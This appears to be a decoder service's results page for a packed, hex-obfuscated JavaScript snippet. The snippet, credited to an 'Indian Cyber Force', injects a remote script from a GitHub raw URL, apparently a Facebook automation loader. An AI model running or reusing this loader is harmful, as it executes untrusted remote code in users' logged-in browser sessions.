Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

var _0x612a = ["\x65\x20\x61\x3D\x27\x66\x20\x62\x3A\x20\x3C\x41\x20\x30\x3D\x22\x31\x3A\x..

Decoded Output download

<?  var _0x612a = ["e a='f b: <A 0="1:#2;" 3="4://8.9.5/g" 6="7">h [i ] j%</A> & <A 0="1:#2;" 3="4://8.9.5/k" 6="7"> l m n o</A>.</c>p q b: </A><A 0="1:#2;" 3="4://8.9.5/r" 6="7"> s t</A></A>,</A><A 0="1:#2;" 3="4://8.9.5/u" 6="7"> v w. x</A></A>.</c>y z B C D E <A 0="1:#2;" 3="4://F.G.H/" 6="7">I J K</A>.</A>';L(M!=a){N:(O(){d.P.Q(d.R('S')).T='U://V.W.5/X/Y-Z/10/11.12'})()}", "|", "split", "style|color|3B5998|href|http|com|target|_blank|www|facebook|Omni_text|By|br|document|var|Powered|313072532101076|Loading|lllllllllll|99|199134496914077|Assam|Indian|Cyber|Force|Script|Made|100001050235420|Waqar|Ahmad|100005115938614|Bhargav|JT|Gogoi|For|More||Tools|Visit|Our|Blogger|automateyourfacebook|blogspot|in|Automate|Your|Facebook|if|_text|javascript|function|body|appendChild|createElement|script|src|https|raw|github|bhargav1996|Fun|time|master|Union|js", "", "fromCharCode", "replace", "\w+", "", "g"]; 
eval(function (_0x1b3bx1, _0x1b3bx2, _0x1b3bx3, _0x1b3bx4, _0x1b3bx5, _0x1b3bx6) { 
    _0x1b3bx5 = function (_0x1b3bx3) { 
        return (_0x1b3bx3 < _0x1b3bx2 ? _0x612a[4] : _0x1b3bx5(parseInt(_0x1b3bx3 / _0x1b3bx2))) + ((_0x1b3bx3 = _0x1b3bx3 % _0x1b3bx2) > 35 ? String[_0x612a[5]](_0x1b3bx3 + 29) : _0x1b3bx3.toString(36)); 
    }; 
    if (!_0x612a[4][_0x612a[6]](/^/, String)) { 
        while (_0x1b3bx3--) { 
            _0x1b3bx6[_0x1b3bx5(_0x1b3bx3)] = _0x1b3bx4[_0x1b3bx3] || _0x1b3bx5(_0x1b3bx3); 
        }; 
        _0x1b3bx4 = [ 
 
            function (_0x1b3bx5) { 
                return _0x1b3bx6[_0x1b3bx5]; 
            } 
        ]; 
        _0x1b3bx5 = function () { 
            return _0x612a[7]; 
        }; 
        _0x1b3bx3 = 1; 
    }; 
    while (_0x1b3bx3--) { 
        if (_0x1b3bx4[_0x1b3bx3]) { 
            _0x1b3bx1 = _0x1b3bx1[_0x612a[6]](new RegExp(_0x612a[8] + _0x1b3bx5(_0x1b3bx3) + _0x612a[8], _0x612a[9]), _0x1b3bx4[_0x1b3bx3]); 
        }; 
    }; 
    return _0x1b3bx1; 
}(_0x612a[0], 62, 65, _0x612a[3][_0x612a[2]](_0x612a[1]), 0, {})); ?>

Did this file decode correctly?

Original Code

var _0x612a = ["\x65\x20\x61\x3D\x27\x66\x20\x62\x3A\x20\x3C\x41\x20\x30\x3D\x22\x31\x3A\x23\x32\x3B\x22\x20\x33\x3D\x22\x34\x3A\x2F\x2F\x38\x2E\x39\x2E\x35\x2F\x67\x22\x20\x36\x3D\x22\x37\x22\x3E\x68\x20\x5B\x69\x20\x5D\x20\x6A\x25\x3C\x2F\x41\x3E\x20\x26\x20\x3C\x41\x20\x30\x3D\x22\x31\x3A\x23\x32\x3B\x22\x20\x33\x3D\x22\x34\x3A\x2F\x2F\x38\x2E\x39\x2E\x35\x2F\x6B\x22\x20\x36\x3D\x22\x37\x22\x3E\x20\x6C\x20\x6D\x20\x6E\x20\x6F\x3C\x2F\x41\x3E\x2E\x3C\x2F\x63\x3E\x70\x20\x71\x20\x62\x3A\x20\x3C\x2F\x41\x3E\x3C\x41\x20\x30\x3D\x22\x31\x3A\x23\x32\x3B\x22\x20\x33\x3D\x22\x34\x3A\x2F\x2F\x38\x2E\x39\x2E\x35\x2F\x72\x22\x20\x36\x3D\x22\x37\x22\x3E\x20\x73\x20\x74\x3C\x2F\x41\x3E\x3C\x2F\x41\x3E\x2C\x3C\x2F\x41\x3E\x3C\x41\x20\x30\x3D\x22\x31\x3A\x23\x32\x3B\x22\x20\x33\x3D\x22\x34\x3A\x2F\x2F\x38\x2E\x39\x2E\x35\x2F\x75\x22\x20\x36\x3D\x22\x37\x22\x3E\x20\x76\x20\x77\x2E\x20\x78\x3C\x2F\x41\x3E\x3C\x2F\x41\x3E\x2E\x3C\x2F\x63\x3E\x79\x20\x7A\x20\x42\x20\x43\x20\x44\x20\x45\x20\x3C\x41\x20\x30\x3D\x22\x31\x3A\x23\x32\x3B\x22\x20\x33\x3D\x22\x34\x3A\x2F\x2F\x46\x2E\x47\x2E\x48\x2F\x22\x20\x36\x3D\x22\x37\x22\x3E\x49\x20\x4A\x20\x4B\x3C\x2F\x41\x3E\x2E\x3C\x2F\x41\x3E\x27\x3B\x4C\x28\x4D\x21\x3D\x61\x29\x7B\x4E\x3A\x28\x4F\x28\x29\x7B\x64\x2E\x50\x2E\x51\x28\x64\x2E\x52\x28\x27\x53\x27\x29\x29\x2E\x54\x3D\x27\x55\x3A\x2F\x2F\x56\x2E\x57\x2E\x35\x2F\x58\x2F\x59\x2D\x5A\x2F\x31\x30\x2F\x31\x31\x2E\x31\x32\x27\x7D\x29\x28\x29\x7D", "\x7C", "\x73\x70\x6C\x69\x74", "\x73\x74\x79\x6C\x65\x7C\x63\x6F\x6C\x6F\x72\x7C\x33\x42\x35\x39\x39\x38\x7C\x68\x72\x65\x66\x7C\x68\x74\x74\x70\x7C\x63\x6F\x6D\x7C\x74\x61\x72\x67\x65\x74\x7C\x5F\x62\x6C\x61\x6E\x6B\x7C\x77\x77\x77\x7C\x66\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x4F\x6D\x6E\x69\x5F\x74\x65\x78\x74\x7C\x42\x79\x7C\x62\x72\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x50\x6F\x77\x65\x72\x65\x64\x7C\x33\x31\x33\x30\x37\x32\x35\x33\x32\x31\x30\x31\x30\x37\x36\x7C\x4C\x6F\x61\x64\x69\x6E\x67\x7C\x6C\x6C\x6C\x6C\x6C\x6C\x6C\x6C\x6C\x6C\x6C\x7C\x39\x39\x7C\x31\x39\x39\x31\x33\x34\x34\x39\x36\x39\x31\x34\x30\x37\x37\x7C\x41\x73\x73\x61\x6D\x7C\x49\x6E\x64\x69\x61\x6E\x7C\x43\x79\x62\x65\x72\x7C\x46\x6F\x72\x63\x65\x7C\x53\x63\x72\x69\x70\x74\x7C\x4D\x61\x64\x65\x7C\x31\x30\x30\x30\x30\x31\x30\x35\x30\x32\x33\x35\x34\x32\x30\x7C\x57\x61\x71\x61\x72\x7C\x41\x68\x6D\x61\x64\x7C\x31\x30\x30\x30\x30\x35\x31\x31\x35\x39\x33\x38\x36\x31\x34\x7C\x42\x68\x61\x72\x67\x61\x76\x7C\x4A\x54\x7C\x47\x6F\x67\x6F\x69\x7C\x46\x6F\x72\x7C\x4D\x6F\x72\x65\x7C\x7C\x54\x6F\x6F\x6C\x73\x7C\x56\x69\x73\x69\x74\x7C\x4F\x75\x72\x7C\x42\x6C\x6F\x67\x67\x65\x72\x7C\x61\x75\x74\x6F\x6D\x61\x74\x65\x79\x6F\x75\x72\x66\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x62\x6C\x6F\x67\x73\x70\x6F\x74\x7C\x69\x6E\x7C\x41\x75\x74\x6F\x6D\x61\x74\x65\x7C\x59\x6F\x75\x72\x7C\x46\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x69\x66\x7C\x5F\x74\x65\x78\x74\x7C\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x62\x6F\x64\x79\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x73\x63\x72\x69\x70\x74\x7C\x73\x72\x63\x7C\x68\x74\x74\x70\x73\x7C\x72\x61\x77\x7C\x67\x69\x74\x68\x75\x62\x7C\x62\x68\x61\x72\x67\x61\x76\x31\x39\x39\x36\x7C\x46\x75\x6E\x7C\x74\x69\x6D\x65\x7C\x6D\x61\x73\x74\x65\x72\x7C\x55\x6E\x69\x6F\x6E\x7C\x6A\x73", "", "\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65", "\x72\x65\x70\x6C\x61\x63\x65", "\x5C\x77\x2B", "\x5C\x62", "\x67"];
eval(function (_0x1b3bx1, _0x1b3bx2, _0x1b3bx3, _0x1b3bx4, _0x1b3bx5, _0x1b3bx6) {
    _0x1b3bx5 = function (_0x1b3bx3) {
        return (_0x1b3bx3 < _0x1b3bx2 ? _0x612a[4] : _0x1b3bx5(parseInt(_0x1b3bx3 / _0x1b3bx2))) + ((_0x1b3bx3 = _0x1b3bx3 % _0x1b3bx2) > 35 ? String[_0x612a[5]](_0x1b3bx3 + 29) : _0x1b3bx3.toString(36));
    };
    if (!_0x612a[4][_0x612a[6]](/^/, String)) {
        while (_0x1b3bx3--) {
            _0x1b3bx6[_0x1b3bx5(_0x1b3bx3)] = _0x1b3bx4[_0x1b3bx3] || _0x1b3bx5(_0x1b3bx3);
        };
        _0x1b3bx4 = [

            function (_0x1b3bx5) {
                return _0x1b3bx6[_0x1b3bx5];
            }
        ];
        _0x1b3bx5 = function () {
            return _0x612a[7];
        };
        _0x1b3bx3 = 1;
    };
    while (_0x1b3bx3--) {
        if (_0x1b3bx4[_0x1b3bx3]) {
            _0x1b3bx1 = _0x1b3bx1[_0x612a[6]](new RegExp(_0x612a[8] + _0x1b3bx5(_0x1b3bx3) + _0x612a[8], _0x612a[9]), _0x1b3bx4[_0x1b3bx3]);
        };
    };
    return _0x1b3bx1;
}(_0x612a[0], 62, 65, _0x612a[3][_0x612a[2]](_0x612a[1]), 0, {}));

Function Calls

None

Variables

None

Stats

MD5 2d0b114d212ca9f39bccea92a6864ff1
Eval Count 0
Decode Time 90 ms